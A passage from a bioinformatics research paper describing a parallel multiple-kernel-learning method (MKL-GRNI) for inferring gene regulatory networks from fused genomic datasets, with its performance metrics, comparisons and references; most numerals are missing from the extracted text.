mkl model needs to be trained for each tf with a set of known regulations for the whole genome. given n tfs, we need to train n different classification models individually and then combine the results from these models for a complete network inference task. as the number of tfs increase, the number of classification models also increase, creating resource deficiency and long execution times for the inference algorithm. the proposed approach attempts to provide a solution to this problem by distributing these classification models to different processors on a multi-processor hardware platform using parallel processing library from python. the results from these models are stored in a shared queue object which are later on used for network inference. a detailed description of the model is contained in the methods section. related literature an early attempt to learn and classify gene function from integrated datasets using kernel methods was carried out in pavlidis et al. ( ). they trained a support vector machine (svm) for gene function classification with a heterogeneous kernel derived from a combination of two different types of data (e.g., gene expression and phylogenetic profiles). since svm does not learn from multiple kernel matrices simultaneously, they proposed three different ways to fuse two datasets and referred to these fusion methods as (i) early integration, (ii) intermediate integration and (iii) late integration approaches. in early integration, feature vectors from heterogeneous data types are concatenated to build a single length vector for a given set of genes. this extended dataset is then transformed into a kernel matrix using appropriate kernel function and serves as an input to the svm model from where we can draw biological inferences. in the case of intermediate integration, the two datasets are first transformed into their respective kernel wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ matrices; subsequently these kernel matrices are added together to yield an integrated kernel for svm training. for late integration, the authors trained the svm models individually using the heterogeneous datasets. the probability scores which act as discriminant values obtained from separate svm models are then added together for gene function prediction. in fact, kernel-based methods as effective integration techniques were first proposed in lanckriet et al. ( ), wherein a -norm soft margin svm is trained for a classification problem, separating membrane proteins from ribosomal proteins. they combined heterogeneous biological datasets such as ppi, amino acid sequences and gene expression data characterizing different proteins by transforming them into multiple positive semidefinite kernel matrices using different kernel functions. their findings reveal an improved classifier performance when all datasets are integrated as a unit compared to testing the classifier on individual datasets. in an earlier study (lanckriet et al., ) on function prediction for baker’s yeast proteins, they trained an svm classifier with multiple datasets of different types and achieved an improved performance over a classifier trained using single data type. in yet another study for network inference using kernel data integration (yamanishi, vert & kanehisa, ), the authors fused four different datasets, namely gene expression data, protein interaction data, protein localization data and data from phylogenetic profiles. these datasets are transformed into different kernel matrices. datasets comprising of gene expression, protein localization and data from phylogenetic profiles were kernelized using gaussian, polynomial and linear kernel functions. graph datasets were kernelized using diffusion kernel (kondor & lafferty, ). this study compared both unsupervised and supervised inference methods on single and integrated datasets. to assess the accuracy of the methods, the inferred networks are compared with a gold standard protein network. contrary to the unsupervised approaches, the supervised approach seems to make interesting predictions and capture most of the information from the gold standard. they observed that data from transcriptomic and phylogenetic profiles seem to contribute with an equal quantum of information followed by noisy ppi and localization data. applying a supervised approach to integrated datasets seems to produce overall best results, therefore highlighting the importance of guided network inference from integrated prior biological knowledge. in another study, ben-hur & noble ( ) applied kernel methods to ppi studies and proposed a pair-wise kernel between two pairs of proteins in order to construct a similarity matrix. this pairwise kernel is based on three sequence kernels, a spectrum kernel, a motif, and a pfam kernel. they further extended this experiment to explore the effect of adding kernels from non-sequence data, such as gene ontology annotations, homology scores and mutual clustering coefficient (mcc) derived from protein interactions computed in each cross-validation fold. integrating these non-sequence features with the pairwise kernel resulted in improved performance than any method by itself. another integration and supervised learning method that uses mkl is the feature selection multiple kernel learning (fsmkl) proposed by seoane et al. ( ). the feature wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ selection is performed on variable number of features per kernel, separating feature sets from each data type with greater relevance to the given problem. the selection criteria uses statistical scoring by ranking features that are statistically aligned with the class labels and biological insights, where genes that are present in a specific pathway are chosen. they integrate gene expression, copy number variation and other genomic data from kegg pathway. these data are transformed into their base kernels and integrated using mkl framework into a combined kernel. the prior biological knowledge in the form of pathway information serves as central criterion for fsmkl to cluster samples. the authors claim that fsmkl performance is comparable to the other state-of-the-art breast cancer prognosis methods from dream challenge. speicher & pfeifer ( ) adopted an unsupervised approach to discover cancer subtypes from an integrated kernel using mkl. the proposed method called regularized mkl locality preserving projections (rmkl-lpp) integrates multi-omics data such as gene expression, dna methylation and mirna expression profiles of multiple cancer types from tcga (tomczak, czerwińska & wiznerowicz, ). this regularized version extends the dimensionality reduction variant of the mkl technique (mkl-dr) proposed by yan et al. ( ). the regularization term allows to use different types of kernels during optimization process and also avoids overfitting. they cluster the samples by applying k-means on the distance summation of each sample’s k-nearest neighbors by applying locality preserving projections (lpp). also many approaches have been proposed for parameter estimation of such large-scale and integrated models. besides, cross validation, grid search and randomised parameter optimization methods (remli et al., ) have proposed a cooperative enhanced scatter search for parameter for high dimensional biological models. their proposed method is executed in a parallel environment and can be faster than other methods in providing accurate estimate of model parameters. multiple kernel learning approach has also been applied to the domain of drug- target interaction network inference and drug bioactivity prediction. for drug-target interaction prediction, nascimento, prudêncio & costa ( ) proposed a new mkl based algorithm that selects and combines kernels automatically on a bipartite drug-protein prediction problem. their proposed method extends the kronecker regularized least squares approach (kronrls) (van laarhoven, nabuurs & marchiori, ) to fit in a mkl setting. the method uses l regularization to produce a non-sparse combination of base kernels. the proposed method can cope with large drug vs. target interaction matrices; does not require sub-sampling of the drug-target network; and is also able to combine and select relevant kernels. they performed the comparative analysis of their proposed method with top performers from single and integrative kernel approaches and demonstrated the competitiveness of kronrls-mkl to all the evaluated scenarios. similarly for drug bioactivity prediction (cichonska et al., ) proposed pairwise mkl method in order to address the scalability issues in handling massive pairwise kernel matrices in terms of both computational complexity and memory demands of such prediction problems. the proposed method has been successfully implemented to the drug bioactivity inference problems and provides a general approach other pairwise mkl spaces. wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ since mkl is applied to solve large scale learning problems, various efforts have been undertaken to devise a scheme whereby mkl algorithm can be run in a multiprocessor and distributed computational environment. the authors in chen & fan ( ) have proposed a parallel multiple kernel learning (pmkl) using hybrid alternating direction method multipliers (h-admm). the proposed method makes the local processors to co-ordinate with each other to achieve the global solution. the results of their experiments demonstrated that pmkl displays fast execution times and higher classification accuracies. another important study to address the scalability and computational requirements in the domain of large scale learning has been carried out by alioscha-perez, oveneke & sahli ( ). they proposed svrg-mkl an mkl solution with inherent scalability properties that can combine multiple descriptors involving millions of samples. they conducted extensive experimental validation of their proposed method on several benchmarking datasets confirming a higher accuracy and significant speedup for svrg-mkl. in one of our recent works, we proposed a data fusion and inference model, called imtf-grn, based on non-negative matrix tri-factorization that integrates the diverse types of biological data (wani & raza, b). the advantage of our proposed parallel mkl-grni approach is that it is simple to implement and does not need complex coding to distribute multiple classification problems in a multiprocessor environment. our method employs shared queue objects for distributing inputs and collecting outputs from multiple processors compared to pmkl (chen & fan, ) where multiple processors are explicitly made to co-ordinate using the hybrid alternating direction method of multipliers (h-admm) introducing complexity and an added computational overhead. also, we chose basic addition operation to fuse multiple kernels compared to kron-rls mkl (cichonska et al., ) method, where the fusion of multiple kernels is achieved by performing kronecker product operation which requires calculating the inverse of individual kernels, hence a computational overhead compared to a basic arithmetic operation. also for mkl implementation, we used the shogun toolbox, which is a highly optimized, stable and efficient tool developed in c++ by sonnenburg et al. ( ) making it a suitable candidate for computing-intensive and large-scale learning problems. materials and methods the proposed method adopts a supervised approach to learn new interactions between a tf and the whole genome of an organism. the algorithm operates on multiple datasets that characterize the genes of an organism. since we are adopting an integrated approach, datasets such as gene expression, known tf-gene regulations, ppi, and dna-methylation data can be combined using mkl approach. all these datasets are carefully chosen owing to their role in gene regulation. the tf-gene interaction data serves a dual purpose. it supplies the algorithm with prior knowledge about the regulatory relationships, and for each tf, the known target gene list also form the labels for the mkl classifier. for each tf, a set of known gene targets serve as positive examples. for negative examples, we divide our input into two subsets; the mkl classifier is trained using positive examples for which no prediction is needed, and the other subset contains wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ negative examples. we perform -fold cross-validation using the same scheme and obtain discriminant values for all the genes with no prior regulation knowledge for this tf. this whole procedure is repeated for all the tfs. the idea here is to identify the set of genes whose expression profiles match those of positive examples even though the classifier is supplied with some false negative examples in the training set. a graphical overview of this architecture is depicted in fig. . the problem of grn inference from integrated datasets through supervised learning using mkl is not a trivial task. the nature of the complexity raises manifold while considering grn inference of organisms with large genomes sizes. in this scenario, the model training and testing becomes tf specific. therefore, the inference problem is decomposed into a set of classification subproblems corresponding to the total number of tfs present in the input gene-tf interaction matrix. a sequential approach to such a problem scenario would require to run each subproblem one after the other in a loop. however, as we increase the number of tfs, the execution time of the algorithm also increases. to overcome such problems, we devise a strategy of parallel execution for the algorithm wherein multiple subproblems run simultaneously across different processors of a multi-processor hardware platform as explained in algorithm . outputs generated by each model in the form of confidence scores (probability that a given tf regulates a gene) are stored in a shared queue object. once all the subproblems finish their execution, the shared object is iterated to collect the results generated by all the models in order to build a single output matrix. in case the number of tfs is more than the number of available processors, they are split into multiple groups and dispatched to each processor with the condition that the number of tfs are divided in such a manner so that all the processors receive equal number of classification models. figure application architecture of mkl-grni (a) combined kernel (b) decomposed regulation matrices (c) parallel distribution and model building (d) model execution (e) writing results to shared object. full-size doi: . /peerj-cs. /fig- wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kernel methods for genomic data fusion kernel methods represent a mathematical framework which embeds data points (genes, proteins, drugs, etc) from input spaceito feature space f by employing a kernel function. genomic datasets viz., mrna expression levels from rna-seq, dna methylation profiles and tf-gene regulation matrix obtained from different databases comprise heterogeneous datasets that can be fused using kernel methods and serve as the building blocks for inference of gene regulatory networks. a modular and generic approach to pattern analysis, kernel methods can operate on very high dimensional data in feature space by performing an inner product on the input data using a kernel function (shawe-taylor & cristianini, ). an algorithm is devised that can work with algorithm mkl-grni parallel approach for supervised inference of large-scale gene regulatory networks. input: k datasets d , d , . . . ., dk input: regulation binary matrix r for classification labels output: a matrix of decision scores ds for tf-gene interaction begin transform d , d , . . . ., dk int k , k , . . . ., kn kernels using appropriate kernel function fuse n kernels as k = k + k +…+kn define mkl parameters params (c, norm, epsilon) /* distribute source tf’s among multiple cpu’s */ foreach cpu in the cpu list do do in parallel foreach tf in source tf list do /* set mkl parameters and data */ set mkl.kernel ) k set mkl.labels )r set mkl.parameters ) params /* obtain decision scores for mkl algorithm between each tf and all genes in the genomes */ dstf ) applymkl() end put dstfk in queue q end end foreach q in q do dstfk ) q.val end end wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ such data and learn patterns. such an algorithm is more generic as they operate on any data type that can be kernelized. these kernels are data specific, such as gaussian, polynomial and sigmoid kernels for vectorial data, diffusion kernels for graph data, and string kernels for different types of sequence data. the kernel part is data specific, creating a flexible and modular approach to combine multiple modules to obtain complex learning systems. a graphical depiction of this fusion technique is shown in fig. . the choice of different kernel functions for transforming datasets into their respective kernel matrices is made after a thorough analysis of literature in the field of kernel methods and mkl methods. mkl model multiple kernel learning is based on integrating many features of objects such as genes, proteins, drugs, etc., via their kernel matrices and represents a paradigm shift from figure genomic data fusion by combining kernel matrices from multiple kernels into a single combined kernel. full-size doi: . /peerj-cs. /fig- wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ machine learning models that use single object features (sonnenburg et al., ). this combined information from multiple kernel matrices is provided as an input to mkl algorithm to perform classification/regression tasks on unseen data. information represented by the kernel matrices can be combined by applying the basic algebraic operations, such as addition, multiplication, and exponentiation such that the positive semi-definiteness of the candidate kernels is preserved in the final kernel matrix. the resultant kernel can be defined by following equations using k and k as candidate kernel matrices and ϕ (x) and ϕ (x), their corresponding embedding in the feature space. k ¼ k þ k ( ) with the new induced embedding �x ¼ � ðxÞ; � ðxÞ ( ) given a kernel set k = {k , k , : : : , km}, an affine combination of m parametrized kernels can be formed as given by: - k ¼ xm i¼ liki ( ) subject to the constraint that μi (weights) are positive that is, μi ≥ , i = ……..m. with these kernel matrices as input, a statistical classifier such as svm separates the two classes using a linear discriminant by inducing a margin in the feature space. to find this discriminant, an optimization problem, known as a quadratic program (qp) needs to be solved. qp belongs to a class of convex optimization problems, which are easily solvable. shogun toolbox solves this mkl optimization problem using semidefinite programing (sdp) first implemented for mkl learning by lanckriet et al. ( ). based on this margin, we classify svm algorithms into hard, -norm soft and -norm soft margin svm. here we use the -norm soft margin svm and sdp for mkl optimization and classification from heterogeneous datasets explained in our earlier work on mkl for biomedical image analysis (wani & raza, ). a detailed literature on svm algorithms is covered in (scholkopf & smola, ). datasets to test the parallel mkl algorithm on multiple datasets, we downloaded gene expression data of escherichia coli and saccharomyces cerevisiae from dream network inference challenge (marbach et al., ) along with their gold standard network and human breast cancer transcriptomic data from tcga. some prominent features of these data are shown in table . because the mkl paradigm provides the platform to fuse heterogeneous datasets, we download ppi data for both e. coli and s. cerevisiae from string database (szklarczyk et al., ). the ppi data is supplied as prior biological knowledge to the algorithm in order to improve its inference accuracy as mkl can learn from multiple datasets. to supplement the human transcriptome with additional biological knowledge, wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we download dna methylation expression data for all the genes in the transcriptome from the tcga broad institute data portal (https://gdac.broadinstitute.org/). the regulation data (i.e., known interaction between genes and tfs) for e.coli and s. cerevisiae were extracted from the gold standard network provided in the dream dataset, however, for grn inference in humans, the regulation data has been collected from a number of databases that store tf-gene interaction data derived from chip-seq and chip-chip experiments. we collected a list of tfs from the encode data portal (https://www. encodeproject.org/) for which chip-seq experiments were carried out on mcf breast cancer cell lines across different experimental labs. the targets of these tfs were extracted from encode (encode project consortium, ), tred (jiang et al., ) and trrust (han et al., ) databases. hardware and software requirements the hardware platform used in this study is an ibm system x m server model that includes an intel xeon processor having cores and a primary memory of gb with extendable option of gb. the system supports a -bit memory addressing scheme having powerful . ghz/ mhz intel xeon processors with mhz front- side bus (fsb) and mb l cache (each processor is dual core and comes with × mb ( mb) l cache). the system also supports hyper threading features for more efficient program execution. in order to exploit this multi-core and multithreading features present in the hardware system we used multiprocessing python package to dispatch different sub-problems across multiple cores of the computing system. the process of distribution of different learning sub-problems among different cores of a multi-core machine has been demonstrated in fig. . for fusion of multiple datasets we use mkl approach whereby different datasets are first converted into similarity matrices (kernels) and then joined to generate a final integrated matrix for learning tf-gene targets. we use mkl python library provided by shogun machine learning toolbox for implementing the proposed algorithm. results all the genomic datasets are transformed into their respective kernel matrices by using an appropriate kernel function. for example, datasets such as gene expression and dna methylation expression data are transformed using a gaussian radial basis function. the ppi data is converted into a diffusion kernel, k = eβh, where h is the negative laplacian derived from adjacency and degree matrix h = a − d of ppi graph. the tf-target gene regulation data is organized as a binary matrix of labels (i.e., and − ) table dataset description of different organisms for supervised grn inference. organism genes samples transcription factors known regulations known targets e. coli , , s. cerevisiae , , , homo sapiens , , , , wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / https://gdac.broadinstitute.org/ https://www.encodeproject.org/ https://www.encodeproject.org/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ with genes in rows and tfs in columns. the number of rows correspond to the genome size of the organism and the number of columns correspond to the total number of tfs being used for grn inference. the elements of each column with value signify that a gene gi is regulated by tfj and − otherwise. such an organization of the regulation data allows us to use each column of the matrix as a label for individual classification problems in a supervised learning environment. we perform two sets of experiments with our proposed approach in order to evaluate the scalability and the inference potential of the supervised learning from heterogeneous datasets using mkl paradigm. our first experiment records execution times required to learn from varying genome and sample sizes on single and multi-processor architectures, given a set of tfs. our second experiment focuses on the evaluation of inference potential of this approach on different genome and sample sizes. since our problem of grn inference is complex, the experiment aims to evaluate the parallel nature of the mkl algorithm by decomposing supervised inference of grns for multiple tfs into a number of subproblems and distribute them to multiple processors for parallel execution. varying the genome and sample sizes in these experiments is to evaluate how efficiently mkl based models scale to large genomes where most of the grn models developed till date do not perform optimally as reported in marbach et al. ( ). the proposed method is implemented in python and the code along with data is available at (https://github.com/waninisar/mkl-grni). to assess the performance of the parallel mkl-grni on different genomes characterized by datasets in table . we execute the algorithm and embed the required code for the evaluation metrics. once the algorithm completes its execution run, all the essential metrics are recorded for further analysis. the metrics are computed to evaluate the capacity of our approach in terms of reduced computational cost and enhanced inference accuracy when dealing with complex and large-scale inference tasks. initially the algorithm is run in sequential mode for all the organisms for a set of tfs, and later on in parallel mode on and cpus. performance metrics for all the datasets are plotted in fig. . a brief description of these important performance metrics is given below: speedup we calculate speedup as a measure of relative performance of executing our algorithm in sequential and parallel processing environments. the speed up is calculated as under:- sðjÞ ¼ tð Þ=tðjÞ ( ) where s(j) is the speedup on j processors, t( ) is the time it takes on a single processor and t(j) is the time program takes on j processors. efficiency efficiency is defined as the ratio of speedup to the number of processing elements (j cpus in our case). it measures the utilization of the computation resources for a fraction of time. ideally in parallel system, speedup is equal to j and efficiency is equal to . however, in wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/waninisar/mkl-grni http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ practice, speedup is less than j and efficiency is between zero and one, depending on the effectiveness with which the processing elements are utilized. we calculate efficiency e(j) on j processors as given below: eðjÞ ¼ sðjÞ=j ( ) redundancy redundancy is computed as the ratio between number of operations executed in parallel and sequential modes. it measures the required increase in the number of computations when the algorithm is run on multiple processors. rðjÞ ¼ oðjÞ=oð Þ ( ) quality quality measures the relevance of using parallel computation and is defined as the ratio between the product of speedup and efficiency to that of redundancy. qðjÞ ¼ sðjÞxeðjÞ=rðjÞ ( ) figure performance metrics for parallel mkl-grni algorithm: (a) speedup, (b) efficiency, (c) redundancy, (d) quality. full-size doi: . /peerj-cs. /fig- wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it is evident from the fig. that there is marked increase in the speedup as we move from a sequential (single cpu) to parallel execution (i.e., and cpus). for an e. coli genome with a sample size of and tfs used for inference, the algorithm shows a sharp speedup as we move from sequential execution to parallel execution on processors, however when the number of processors is increased to , there is marginal increase in speedup for e. coli. on the other hand, there is considerable increase in speedup recorded for and processors on higher genomes, such as s. cerevisiae and homo sapiens, suggesting an increase in the capacity of the parallel algorithm to reduce the execution times. to assess the resource utilization using our parallel approach, the efficiency metric shows considerable drop in utilization of compute resources for all the three datasets, because only a section of algorithm runs in parallel. this can be inferred from the computed redundancy for sequential and parallel executions. the redundancy plot shows slight increase in terms of the computational cost incurred when running our computational problem in parallel, thereby suggesting less computational overhead as we switch from sequential to parallel mode of execution. to evaluate the relevance of parallel execution to our problem, we calculate quality metric for all the three datasets. from the barplots we can observe that parallel algorithms are less relevant when applied to smaller genomes as is evident in case of e. coli. but there is steady improvement in quality metric as move from s. cerevisiae to homo sapiens with relevance indicator high when yeast dataset is run on processors and human dataset on processors. these improvements in speedup and quality metrics when running the algorithm in parallel provides us with a framework to work with more complex datasets and organisms with large genome sizes to infer very large scale grns using a supervised approach. to assess the inference potential of this supervised method we compare the proposed approach with other methods that infer gene interactions from single and integrated datasets. initially we apply mkl-grni to dream e.coli data, we performed a -fold cross-validation to make sure that model is trained on all the known regulations. at each cross-validation step, important performance metrics such as precision, recall and f score are recorded and then averaged for the whole cross-validation procedure. we then compared our network inference method with inference methods that predict tf-target gene regulations, such as clr (faith et al., ) and sirene (mordelet & vert, ). the results are recorded in table . after running all the inference procedures, it is observed that the average precision , recall and f metrics generated by running mkl-grni is quite higher than those generated by other comparable methods. the improvement with mkl-grni can be attributed to the additional biological knowledge in the form of protein-protein interactions between e.coli genes to aid in the inference process. to test the proposed method on integrated data, we perform a fold cross-validation procedure on the input data. in this experiment, the known target genes of each organism as depicted in table are split into training and test sets. the model is trained on the features from the training set, and the network inference is performed between the genes in the test set, important evaluation metrics, such as precision, recall and f scores are recorded for each iteration and averaged across cross-validation runs. table summarizes wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ these metric for varying genome and sample size for human breast cancer dataset and table contains results for all the three genomes. it is evident from these results that the mkl-grni algorithm scales well for higher genomes sizes. these metrics highlight the learning and inference potential of mkl. looking at table we observe an average recall of % and an average precision of % with an average f measure of % for a genome size of , and sample size of , with an increase in these metrics as we increase the sample size to and , respectively. however, as we start increasing the size of the genome, these metrics start a gradual decline for smaller sample size and again show a marginal increase as we increase the sample size for a fixed genome size. although there is no direct rule of determining the number of samples corresponding to the size of the genome in omics studies, the improvements in precision, recall and f measures suggests an improvement in learning and inference potential of mkl algorithm with an increase in the number of samples. also the tabulated metrics for all the three genomes in table show a considerable decline table average precision, recall and f measures for various inference methods. method average precision average recall average f score clr . . . sirene . . . mkl-grni . . . table precision, recall and f measure recorded for different combination of genome and sample sizes for breast cancer data. no. of genes no. of samples average recall average precision average f measure , . . . , . . . , , . . . , . . . , . . . , , . . . , . . . , . . . , , . . . table precision, recall and f measures averaged across cross-validation runs for complete genomes. organism no. of genes no. of samples avg. precision avg. recall avg. f measure e. coli , . . . s. cerevisiae , . . . homo sapiens , , . . . wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in the evaluation metrics as we move from smaller to larger genomes, suggesting a decrease in inference potential of the algorithm for larger datasets. the possible decline in the performance metrics can be attributed to increase in the genome size as we move from simple prokaryotic to more complex eukaryotic genomes. this increase in the genome sizes versus the sample size leads to curse of dimensionality and therefore making difficult to learn properly from skewed datasets. we also compare our mkl-grni with a recently developed integrative random forest for gene regulatory network inference (irafnet) (petralia et al., ). we select dream datasets of e. coli and s. cerevisiae and integrate ppi and gene expression data from both datasets. for mkl we build gaussian and diffusion kernels from expression and ppi data. for irafnet , the expression data serves as the main data and the ppi data is used as support data. sampling weights are then derived from ppi data by building a diffusion kernel as k = eh where h is a graph laplacian for ppi data. sampling weights from k are derived as wppii, j = k(i, j) that is, the element k (i,j). the sampling weights thus obtained are then integrated with main data set (i.e., gene expression data). putative regulatory links are then predicted using importance scores generated using the irafnet r package. the auc and aupr scores obtained using irafnet and mkl-grni are listed in table . the auc and aupr scores of mkl-grni thus obtained are comparable to irafnet for both datasets. however, irafnet reports a lower auc and higher aupr scores compared to mkl-grni when run on e. coli data. but once we move towards a higher genome size, these scores start dropping marginally for both irafnet and mkl-grni approaches. the slight higher auc scores in case of mkl-grni can be attributed to some extent to the skewed class label distribution where in negative labels far outnumber the positive ones because of limited known regulations. this class imbalance leads to higher predictive accuracy (auc) but lower precision-recall scores (aupr). on the other hand regression based grn inference techniques have been reported to perform well for smaller genomes with genie (huynh-thu et al., ) being a start performer in dream network inference challenges. the higher aupr generated by irafnet in case of e. coli can be attributed to the way potential regulators are sampled using prior information from sampling weights (ppi), therefore decreasing false positives and increasing precision and recall. but for higher genomes (i.e, yeast in our case) the performance of both approaches begins to fall as reported by (mordelet & vert, ). present implementation of irafnet does not provide the ability to run the random forest algorithm in parallel. therefore, using irafnet for grni of higher genomes can incur huge computational cost by running thousands of decision trees in sequential mode. table auc and aupr scores for e. coli and s. cerevisiae using irafnet and mkl-grni. datasets irafnet mkl-grni auc aupr auc aupr e. coli . . . . s. cerevisiae . . . . wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ since our main motive in this study is to parallelize the inference algorithm for large-scale grni, the higher speedup and higher quality provided by running mlk-grni in parallel can be used as a trade-off for slightly lower aupr compared to irafnet run in sequential mode with marginally higher aupr scores. discussion and conclusion here we present a scalable and parallel approach to grn inference using mkl as integration and supervised learning framework. the algorithm has been implemented in python using python interface to mkl provided by shogun machine learning toolbox (sonnenburg et al., ). the ability of kernel methods in pattern discovery and learning from genomic data fusion of multi-omics data using mkl has already been demonstrated in a number of inference studies. our focus here is to explore the scalability option for large-scale grn inference in a supervised machine learning setting, besides assessing the inference potential across different genomes. the approach undertaken can be considered as a parallel extension to sirene (mordelet & vert, ). although sirene performs better than other unsupervised and information theoretic based inference methods as reported by (mordelet & vert, ). however, it lacks the ability to learn from heterogeneous genomic datasets that can provide essential and complementary information for grn inference. another limitation is the sequential execution of the tf-specific classification problems that incur the huge cost in terms of execution times as we move from e. coli genomes to more complex and large genomes of mice and humans. therefore to facilitate very large scale grn inference using supervised learning approach, we use the concept of decomposing the initial problems of learning grn into many subproblems, where each subproblem is aimed to infer a grn for a specific tf. our algorithm distributes all such learning problems to different processors on a multi-processor hardware platform and dispatches them for simultaneous execution, thereby reducing the execution time of the inference process substantially. the results from each execution are written to a shared queue object, once all the child processes complete their execution, the queue object is iterated to build a single output matrix for genome-scale grn inference. we also assess the inference potential of our mkl based parallel grn inference approach by computing essential evaluation metrics for machine learning based approaches. a quick survey of scientific literature on grn inference methods will ensure that the results obtained by our approach are comparable to other state-of-the-art methods in this domain and some cases better than inference methods that employ only gene expression data (e.g., clr, aracne, sirene, etc. ). a drawback of our approach is that only tfs with known targets can be used to train the inference model. also, the performance of the algorithm tends to decrease if the model training is carried out using tfs with few known targets, leading to a bias in favor of tfs with many known neighbors (i.e., hubs) and is less likely to predict new associations for tfs with very few neighbors. besides, we are not able to identify new tfs among the newly learned interaction, nor the model can predict whether a given gene is upregulated or downregulated by a particular tf. wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ therefore additional work is needed to improve the efficiency of the parallel algorithm and the inference potential of the mkl-grni. in our current implementation, we integrate only two datasets for grni, therefore leaving the scope to use more omics sources that can be integrated for improved performance of the inference model. also, the mkl framework provides a mechanism to weigh the contribution of individual datasets that can be used to select informative datasets for integration. further, we do not identify tfs from the predicted target genes and can be considered in future extension to this work. besides, novel techniques to choose negative examples for training our parallel mkl-grni model can be incorporated to decrease the number of false positives and improve the overall precision/recall scores for genomes of higher organisms. additional information and declarations funding nisar wani is supported by teacher fellowship of university grants commission, ministry of human resources development, govt. of india vide letter no. f.b no. -(tf- )/ under faculty development programme. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: university grants commission, ministry of human resources development, govt. of india: f.b no. -(tf- )/ . competing interests the authors declare that they have no competing interests. author contributions � nisar wani conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � khalid raza conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the code is available at github: https://github.com/waninisar/mkl-grni. references albert r. . network inference, analysis, and modeling in systems biology. plant cell ( ): – doi . /tpc. . . wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/waninisar/mkl-grni http://dx.doi.org/ . /tpc. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ alioscha-perez m, oveneke mc, sahli h. . svrg-mkl: a fast and scalable multiple kernel learning solution for features combination in multi-class classification problems. ieee transactions on neural networks and learning systems ( ): – doi . /tnnls. . . ben-hur a, noble ws. . kernel methods for predicting protein-protein interactions. bioinformatics (suppl. ):i –i doi . /bioinformatics/bti . butte aj, kohane is. . mutual information relevance networks: functional genomic clustering using pairwise entropy measurements. in: biocomputing . singapore: world scientific, – . chen z-y, fan z-p. . parallel multiple kernel learning: a hybrid alternating direction method of multipliers. knowledge and information systems ( ): – doi . /s - - - . cichonska a, pahikkala t, szedmak s, julkunen h, airola a, heinonen m, aittokallio t, rousu j. . learning with multiple pairwise kernels for drug bioactivity prediction. bioinformatics ( ):i –i doi . /bioinformatics/bty . encode project consortium. . the encode (encyclopedia of dna elements) project. science ( ): – doi . /science. . faith jj, hayete b, thaden jt, mogno i, wierzbowski j, cottarel g, kasif s, collins jj, gardner ts. . large-scale mapping and validation of escherichia coli transcriptional regulation from a compendium of expression profiles. plos biology ( ):e doi . /journal.pbio. . han h, shim h, shin d, shim je, ko y, shin j, kim h, cho a, kim e, lee t, kim h, kim k, yang s, bae d, yun a, kim s, kim cy, cho hj, kang b, shin s, lee i. . trrust: a reference database of human transcriptional regulatory interactions. scientific reports ( ): doi . /srep . hecker m, lambeck s, toepfer s, van someren e, guthke r. . gene regulatory network inference: data integration in dynamic models: a review. biosystems ( ): – doi . /j.biosystems. . . . huynh-thu va, irrthum a, wehenkel l, geurts p. . inferring regulatory networks from expression data using tree-based methods. plos one ( ):e doi . /journal.pone. . jiang c, xuan z, zhao f, zhang mq. . tred: a transcriptional regulatory element database, new entries and other development. nucleic acids research (suppl. ):d –d doi . /nar/gkl . kondor ri, lafferty j. . diffusion kernels on graphs and other discrete structures. proceedings of the th international conference on machine learning : – . lanckriet gr, de bie t, cristianini n, jordan mi, noble ws. . kernel-based data fusion and its application to protein function prediction in yeast. in: biocomputing . singapore: world scientific, – . lanckriet gr, de bie t, cristianini n, jordan mi, noble ws. . a statistical framework for genomic data fusion. bioinformatics ( ): – doi . /bioinformatics/bth . lee ti, rinaldi nj, robert f, odom dt, bar-joseph z, gerber gk, hannett nm, harbison ct, thompson cm, simon i, zeitlinger j, jennings eg, murray hl, gordon db, ren b, wyrick jj, tagne j-b, volkert tl, fraenkel e, gifford dk, young ra. . transcriptional regulatory networks in saccharomyces cerevisiae. science ( ): – doi . /science. . marbach d, costello jc, küffner r, vega nm, prill rj, camacho dm, allison kr, consortium d, kellis m, collins jj, stolovitzky g. . wisdom of crowds for robust gene network inference. nature methods ( ): . wani and raza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tnnls. . http://dx.doi.org/ . /bioinformatics/bti http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /bioinformatics/bty http://dx.doi.org/ . /science. http://dx.doi.org/ . /journal.pbio. 